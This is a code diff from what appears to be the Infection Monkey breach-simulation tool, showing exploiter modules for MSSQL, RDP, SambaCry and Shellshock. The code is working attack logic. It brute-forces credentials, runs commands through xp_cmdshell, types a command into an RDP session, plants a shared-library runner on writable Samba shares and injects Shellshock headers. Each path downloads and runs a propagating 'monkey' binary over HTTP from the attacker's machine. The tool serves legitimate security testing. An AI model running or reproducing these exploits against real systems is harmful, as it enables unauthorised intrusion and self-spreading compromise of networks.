TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
XP_CMDSHELL_COMMAND_START = "xp_cmdshell \""
XP_CMDSHELL_COMMAND_END = "\""
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \
"DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')"
def __init__(self, host):
super(MSSQLExploiter, self).__init__(host)
self.cursor = None
self.monkey_server = None
self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME)
def _exploit_host(self):
"""
First this method brute forces to get the mssql connection (cursor).
Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
# Create dir for payload
self.create_temp_dir()
try:
self.create_empty_payload_file()
self.start_monkey_server()
self.upload_monkey()
self.stop_monkey_server()
# Clear payload to pass in another command
self.create_empty_payload_file()
self.run_monkey()
self.remove_temp_dir()
except Exception as e:
raise ExploitingVulnerableMachineError, e.args, sys.exc_info()[2]
return True
def run_payload_file(self):
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
return self.run_mssql_command(file_running_command)
def create_temp_dir(self):
dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
self.run_mssql_command(dir_creation_command)
def create_empty_payload_file(self):
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
self.run_mssql_command(tmp_file_creation_command)
def run_mssql_command(self, mssql_command):
array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
if not array_of_commands:
raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
self.run_mssql_commands(array_of_commands)
def run_monkey(self):
monkey_launch_command = self.get_monkey_launch_command()
self.run_mssql_command(monkey_launch_command)
self.run_payload_file()
def run_mssql_commands(self, cmds):
for cmd in cmds:
self.cursor.execute(cmd)
sleep(MSSQLExploiter.QUERY_BUFFER)
def upload_monkey(self):
monkey_download_command = self.write_download_command_to_payload()
self.run_payload_file()
self.add_executed_cmd(monkey_download_command.command)
def remove_temp_dir(self):
# Remove temporary dir we stored payload at
tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path))
self.run_mssql_command(tmp_file_removal_command)
tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
self.run_mssql_command(tmp_dir_removal_command)
def start_monkey_server(self):
self.monkey_server = MonkeyHTTPServer(self.host)
self.monkey_server.start()
def stop_monkey_server(self):
self.monkey_server.stop()
def write_download_command_to_payload(self):
monkey_download_command = self.get_monkey_download_command()
self.run_mssql_command(monkey_download_command)
return monkey_download_command
def get_monkey_launch_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
# Form monkey's launch command
monkey_args = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
dst_path)
suffix = ">>{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
prefix=prefix,
suffix=suffix)
def get_monkey_download_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\
format(http_path=self.monkey_server.http_path, dst_path=dst_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
return MSSQLLimitedSizePayload(command=monkey_download_command,
suffix=suffix,
prefix=prefix)
def brute_force(self, host, port, users_passwords_pairs_list):
"""
Starts the brute force connection attempts and if needed then init the payload process.
Main loop starts here.
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
Return:
True or False depends if the whole bruteforce and attack process was completed successfully or not
"""
# Main loop
# Iterates on users list
for user, password in users_passwords_pairs_list:
try:
# Core steps
# Trying to connect
conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
LOG.info(
'Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}'.format(
host, user, self._config.hash_sensitive_data(password)))
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)
cursor = conn.cursor()
return cursor
except pymssql.OperationalError:
self.report_login_attempt(False, user, password)
# Combo didn't work, hopping to the next one
pass
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
'aborting brute force'.format(host, port))
raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
class MSSQLLimitedSizePayload(LimitedSizePayload):
def __init__(self, command, prefix="", suffix=""):
super(MSSQLLimitedSizePayload, self).__init__(command=command,
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix,
suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END)

View File

@ -1,334 +0,0 @@
import os.path
import threading
import time
from logging import getLogger
import rdpy.core.log as rdpy_log
import twisted.python.log
from rdpy.core.error import RDPSecurityNegoFail
from rdpy.protocol.rdp import rdp
from twisted.internet import reactor
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import HTTPTools, get_monkey_depth
from infection_monkey.exploit.tools import get_target_monkey
from infection_monkey.model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.exploit.tools import build_monkey_commandline
__author__ = 'hoffer'
KEYS_INTERVAL = 0.1
MAX_WAIT_FOR_UPDATE = 120
KEYS_SENDER_SLEEP = 0.01
DOWNLOAD_TIMEOUT = 60
RDP_PORT = 3389
LOG = getLogger(__name__)
def twisted_log_func(*message, **kw):
if kw.get('isError'):
error_msg = 'Unknown'
if 'failure' in kw:
error_msg = kw['failure'].getErrorMessage()
LOG.error("Error from twisted library: %s" % (error_msg,))
else:
LOG.debug("Message from twisted library: %s" % (str(message),))
def rdpy_log_func(message):
LOG.debug("Message from rdpy library: %s" % (message,))
twisted.python.log.msg = twisted_log_func
rdpy_log._LOG_LEVEL = rdpy_log.Level.ERROR
rdpy_log.log = rdpy_log_func
# thread for twisted reactor, create once.
global g_reactor
g_reactor = threading.Thread(target=reactor.run, args=(False,))
class ScanCodeEvent(object):
def __init__(self, code, is_pressed=False, is_special=False):
self.code = code
self.is_pressed = is_pressed
self.is_special = is_special
class CharEvent(object):
def __init__(self, char, is_pressed=False):
self.char = char
self.is_pressed = is_pressed
class SleepEvent(object):
def __init__(self, interval):
self.interval = interval
class WaitUpdateEvent(object):
def __init__(self, updates=1):
self.updates = updates
pass
def str_to_keys(orig_str):
result = []
for c in orig_str:
result.append(CharEvent(c, True))
result.append(CharEvent(c, False))
result.append(WaitUpdateEvent())
return result
class KeyPressRDPClient(rdp.RDPClientObserver):
def __init__(self, controller, keys, width, height, addr):
super(KeyPressRDPClient, self).__init__(controller)
self._keys = keys
self._addr = addr
self._update_lock = threading.Lock()
self._wait_update = False
self._keys_thread = threading.Thread(target=self._keysSender)
self._keys_thread.daemon = True
self._width = width
self._height = height
self._last_update = 0
self.closed = False
self.success = False
self._wait_for_update = None
def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
update_time = time.time()
self._update_lock.acquire()
self._last_update = update_time
self._wait_for_update = False
self._update_lock.release()
def _keysSender(self):
LOG.debug("Starting to send keystrokes")
while True:
if self.closed:
return
if len(self._keys) == 0:
reactor.callFromThread(self._controller.close)
LOG.debug("Closing RDP connection to %s:%s", self._addr.host, self._addr.port)
return
key = self._keys[0]
self._update_lock.acquire()
time_diff = time.time() - self._last_update
if type(key) is WaitUpdateEvent:
self._wait_for_update = True
self._update_lock.release()
key.updates -= 1
if key.updates == 0:
self._keys = self._keys[1:]
elif time_diff > KEYS_INTERVAL and (not self._wait_for_update or time_diff > MAX_WAIT_FOR_UPDATE):
self._wait_for_update = False
self._update_lock.release()
if type(key) is ScanCodeEvent:
reactor.callFromThread(self._controller.sendKeyEventScancode, key.code, key.is_pressed,
key.is_special)
elif type(key) is CharEvent:
reactor.callFromThread(self._controller.sendKeyEventUnicode, ord(key.char), key.is_pressed)
elif type(key) is SleepEvent:
time.sleep(key.interval)
self._keys = self._keys[1:]
else:
self._update_lock.release()
time.sleep(KEYS_SENDER_SLEEP)
def onReady(self):
time.sleep(1)
reactor.callFromThread(self._controller.sendKeyEventUnicode, ord('Y'), True)
time.sleep(1)
reactor.callFromThread(self._controller.sendKeyEventUnicode, ord('Y'), False)
time.sleep(1)
pass
def onClose(self):
self.success = len(self._keys) == 0
self.closed = True
def onSessionReady(self):
LOG.debug("Logged in, session is ready for work")
self._last_update = time.time()
self._keys_thread.start()
class CMDClientFactory(rdp.ClientFactory):
def __init__(self, username, password="", domain="", command="", optimized=False, width=666, height=359):
self._username = username
self._password = password
self._domain = domain
self._keyboard_layout = "en"
# key sequence: WINKEY+R,cmd /v,Enter,<command>&exit,Enter
self._keys = [SleepEvent(1),
ScanCodeEvent(91, True, True),
ScanCodeEvent(19, True),
ScanCodeEvent(19, False),
ScanCodeEvent(91, False, True), WaitUpdateEvent()] + str_to_keys("cmd /v") + \
[WaitUpdateEvent(), ScanCodeEvent(28, True),
ScanCodeEvent(28, False), WaitUpdateEvent()] + str_to_keys(command + "&exit") + \
[WaitUpdateEvent(), ScanCodeEvent(28, True),
ScanCodeEvent(28, False), WaitUpdateEvent()]
self._optimized = optimized
self._security = rdp.SecurityLevel.RDP_LEVEL_NLA
self._nego = True
self._client = None
self._width = width
self._height = height
self.done_event = threading.Event()
self.success = False
def buildObserver(self, controller, addr):
"""
@summary: Build RFB observer
We use a RDPClient as RDP observer
@param controller: build factory and needed by observer
@param addr: destination address
@return: RDPClientQt
"""
# create client observer
self._client = KeyPressRDPClient(controller, self._keys, self._width, self._height, addr)
controller.setUsername(self._username)
controller.setPassword(self._password)
controller.setDomain(self._domain)
controller.setKeyboardLayout(self._keyboard_layout)
controller.setHostname(addr.host)
if self._optimized:
controller.setPerformanceSession()
controller.setSecurityLevel(self._security)
return self._client
def clientConnectionLost(self, connector, reason):
# try reconnect with basic RDP security
if reason.type == RDPSecurityNegoFail and self._nego:
LOG.debug("RDP Security negotiate failed on %s:%s, starting retry with basic security" %
(connector.host, connector.port))
# stop nego
self._nego = False
self._security = rdp.SecurityLevel.RDP_LEVEL_RDP
connector.connect()
return
LOG.debug("RDP connection to %s:%s closed" % (connector.host, connector.port))
self.success = self._client.success
self.done_event.set()
def clientConnectionFailed(self, connector, reason):
LOG.debug("RDP connection to %s:%s failed, with error: %s" %
(connector.host, connector.port, reason.getErrorMessage()))
self.success = False
self.done_event.set()
class RdpExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
def __init__(self, host):
super(RdpExploiter, self).__init__(host)
def is_os_supported(self):
if super(RdpExploiter, self).is_os_supported():
return True
if not self.host.os.get('type'):
is_open, _ = check_tcp_port(self.host.ip_addr, RDP_PORT)
if is_open:
self.host.os['type'] = 'windows'
return True
return False
def exploit_host(self):
global g_reactor
is_open, _ = check_tcp_port(self.host.ip_addr, RDP_PORT)
if not is_open:
LOG.info("RDP port is closed on %r, skipping", self.host)
return False
src_path = get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# create server for http download.
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {
'monkey_path': self._config.dropper_target_path_win_32,
'http_path': http_path, 'parameters': cmdline}
else:
command = RDP_CMDLINE_HTTP_BITS % {
'monkey_path': self._config.dropper_target_path_win_32,
'http_path': http_path, 'parameters': cmdline}
user_password_pairs = self._config.get_exploit_user_password_pairs()
if not g_reactor.is_alive():
g_reactor.daemon = True
g_reactor.start()
exploited = False
for user, password in user_password_pairs:
try:
# run command using rdp.
LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
self.host, user, password)
LOG.info("RDP connected to %r", self.host)
client_factory = CMDClientFactory(user, password, "", command)
reactor.callFromThread(reactor.connectTCP, self.host.ip_addr, RDP_PORT, client_factory)
client_factory.done_event.wait()
if client_factory.success:
exploited = True
self.report_login_attempt(True, user, password)
break
else:
# failed exploiting with this user/pass
self.report_login_attempt(False, user, password)
except Exception as exc:
LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", self.host,
user, password, exc)
continue
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
if not exploited:
LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
return False
elif http_thread.downloads == 0:
LOG.debug("Exploiter RdpGrinder failed, http download failed.")
return False
LOG.info("Executed monkey '%s' on remote victim %r",
os.path.basename(src_path), self.host)
return True

View File

@ -4,9 +4,9 @@ import posixpath
import re
import time
from io import BytesIO
from os import path
import impacket.smbconnection
from impacket.nmb import NetBIOSError
from impacket.nt_errors import STATUS_SUCCESS
from impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAndX_Parameters, SMBNtCreateAndX_Data, \
FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE
@ -19,8 +19,11 @@ import infection_monkey.monkeyfs as monkeyfs
from infection_monkey.exploit import HostExploiter
from infection_monkey.model import DROPPER_ARG
from infection_monkey.network.smbfinger import SMB_SERVICE
from infection_monkey.exploit.tools import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
from infection_monkey.exploit.tools.helpers import get_interface_to_target
from infection_monkey.pyinstaller_utils import get_binary_file_path
from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
__author__ = 'itay.mizeretz'
@ -34,6 +37,7 @@ class SambaCryExploiter(HostExploiter):
"""
_TARGET_OS_TYPE = ['linux']
_EXPLOITED_SERVICE = "Samba"
# Name of file which contains the monkey's commandline
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
# Name of file which contains the runner's result
@ -50,11 +54,13 @@ class SambaCryExploiter(HostExploiter):
SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
# Monkey copy filename on share (64 bit)
SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
# Supported samba port
SAMBA_PORT = 445
def __init__(self, host):
super(SambaCryExploiter, self).__init__(host)
def exploit_host(self):
def _exploit_host(self):
if not self.is_vulnerable():
return False
@ -62,9 +68,9 @@ class SambaCryExploiter(HostExploiter):
LOG.info("Writable shares and their credentials on host %s: %s" %
(self.host.ip_addr, str(writable_shares_creds_dict)))
self._exploit_info["shares"] = {}
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
self._exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file.
@ -79,15 +85,21 @@ class SambaCryExploiter(HostExploiter):
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
'host': self.host.ip_addr,
'port': self.SAMBA_PORT,
'share_name': share}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
for share, fullpath in successfully_triggered_shares:
self._exploit_info["shares"][share]["fullpath"] = fullpath
self.exploit_info["shares"][share]["fullpath"] = fullpath
if len(successfully_triggered_shares) > 0:
LOG.info(
"Shares triggered successfully on host %s: %s" % (
self.host.ip_addr, str(successfully_triggered_shares)))
self.add_vuln_port(self.SAMBA_PORT)
return True
else:
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)
@ -172,7 +184,7 @@ class SambaCryExploiter(HostExploiter):
if self.is_share_writable(smb_client, share):
writable_shares_creds_dict[share] = credentials
except (impacket.smbconnection.SessionError, SessionError):
except (impacket.smbconnection.SessionError, SessionError, NetBIOSError):
# If failed using some credentials, try others.
pass
@ -257,7 +269,10 @@ class SambaCryExploiter(HostExploiter):
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
T1105Telem(ScanStatus.USED,
get_interface_to_target(self.host.ip_addr),
self.host.ip_addr,
monkey_bin_64_src_path).send()
smb_client.disconnectTree(tree_id)
def trigger_module(self, smb_client, share):

View File

@ -32,7 +32,7 @@ int samba_init_module(void)
const char RUN_MONKEY_CMD[] = "./";
const char MONKEY_DEST_FOLDER[] = "/tmp";
const char MONKEY_DEST_NAME[] = "monkey";
int found = 0;
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
char commandline[LINE_MAX_LENGTH] = {'\0'};
@ -43,22 +43,22 @@ int samba_init_module(void)
int monkeySize = 0;
void* monkeyBinary = NULL;
struct stat fileStats;
pid = fork();
if (0 != pid)
{
// error or this is parent - nothing to do but return.
return 0;
}
// Find fullpath of running module.
pFile = fopen("/proc/self/maps", "r");
if (NULL == pFile)
{
return 0;
}
while (fgets(modulePathLine, LINE_MAX_LENGTH, pFile) != NULL) {
fileNamePointer = strstr(modulePathLine, RUNNER_FILENAME);
if (fileNamePointer != NULL) {
@ -66,44 +66,42 @@ int samba_init_module(void)
break;
}
}
fclose(pFile);
// We can't find ourselves in module list
if (0 == found)
{
return 0;
}
monkeyDirectory = strchr(modulePathLine, '/');
*fileNamePointer = '\0';
if (0 != chdir(monkeyDirectory))
{
return 0;
}
// Write file to indicate we're running
pFile = fopen(RUNNER_RESULT_FILENAME, "w");
if (NULL == pFile)
{
return 0;
}
fwrite(monkeyDirectory, 1, strlen(monkeyDirectory), pFile);
fclose(pFile);
// Read commandline
pFile = fopen(COMMANDLINE_FILENAME, "r");
if (NULL == pFile)
{
return 0;
}
// Build commandline
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
strncat(commandline, " ", 1);
snprintf(commandline, sizeof(commandline), "%s%s ", RUN_MONKEY_CMD, MONKEY_DEST_NAME);
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
fclose(pFile);

View File

@ -4,4 +4,4 @@
extern int samba_init_module(void);
extern int init_samba_module(void);
#endif // monkey_runner_h__
#endif // monkey_runner_h__

View File

@ -6,11 +6,13 @@ from random import choice
import requests
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.model import DROPPER_ARG
from infection_monkey.exploit.shellshock_resources import CGI_FILES
from infection_monkey.exploit.tools import build_monkey_commandline
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
__author__ = 'danielg'
@ -18,6 +20,7 @@ LOG = logging.getLogger(__name__)
TIMEOUT = 2
TEST_COMMAND = '/bin/uname -a'
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
LOCK_HELPER_FILE = '/tmp/monkey_shellshock'
class ShellShockExploiter(HostExploiter):
@ -26,6 +29,7 @@ class ShellShockExploiter(HostExploiter):
}
_TARGET_OS_TYPE = ['linux']
_EXPLOITED_SERVICE = 'Bash'
def __init__(self, host):
super(ShellShockExploiter, self).__init__(host)
@ -35,7 +39,7 @@ class ShellShockExploiter(HostExploiter):
) for _ in range(20))
self.skip_exist = self._config.skip_exploit_if_file_exist
def exploit_host(self):
def _exploit_host(self):
# start by picking ports
candidate_services = {
service: self.host.services[service] for service in self.host.services if
@ -65,7 +69,7 @@ class ShellShockExploiter(HostExploiter):
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
# we want to report all vulnerable URLs even if we didn't succeed
self._exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
# now try URLs until we install something on victim
for _, url, header, exploit in exploitable_urls:
@ -105,6 +109,10 @@ class ShellShockExploiter(HostExploiter):
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
if not self._create_lock_file(exploit, url, header):
LOG.info("Another monkey is running shellshock exploit")
return True
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
@ -121,6 +129,8 @@ class ShellShockExploiter(HostExploiter):
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
self._remove_lock_file(exploit, url, header)
if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
@ -130,6 +140,7 @@ class ShellShockExploiter(HostExploiter):
chmod = '/bin/chmod +x %s' % dropper_target_path_linux
run_path = exploit + chmod
self.attack_page(url, header, run_path)
T1222Telem(ScanStatus.USED, chmod, self.host).send()
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
@ -143,7 +154,7 @@ class ShellShockExploiter(HostExploiter):
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
LOG.info("Log file does not exist, monkey might not have run")
continue
self.add_executed_cmd(cmdline)
return True
return False
@ -178,6 +189,17 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
return False,
def _create_lock_file(self, exploit, url, header):
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
return False
cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
return True
def _remove_lock_file(self, exploit, url, header):
cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
@staticmethod
def attack_page(url, header, attack):
result = ""
@ -202,8 +224,17 @@ class ShellShockExploiter(HostExploiter):
if is_https:
attack_path = 'https://'
attack_path = attack_path + str(host) + ":" + str(port)
reqs = []
timeout = False
attack_urls = [attack_path + url for url in url_list]
reqs = [requests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls]
for u in attack_urls:
try:
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT))
except requests.Timeout:
timeout = True
break
if timeout:
LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.")
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]

Some files were not shown because too many files have changed in this diff Show More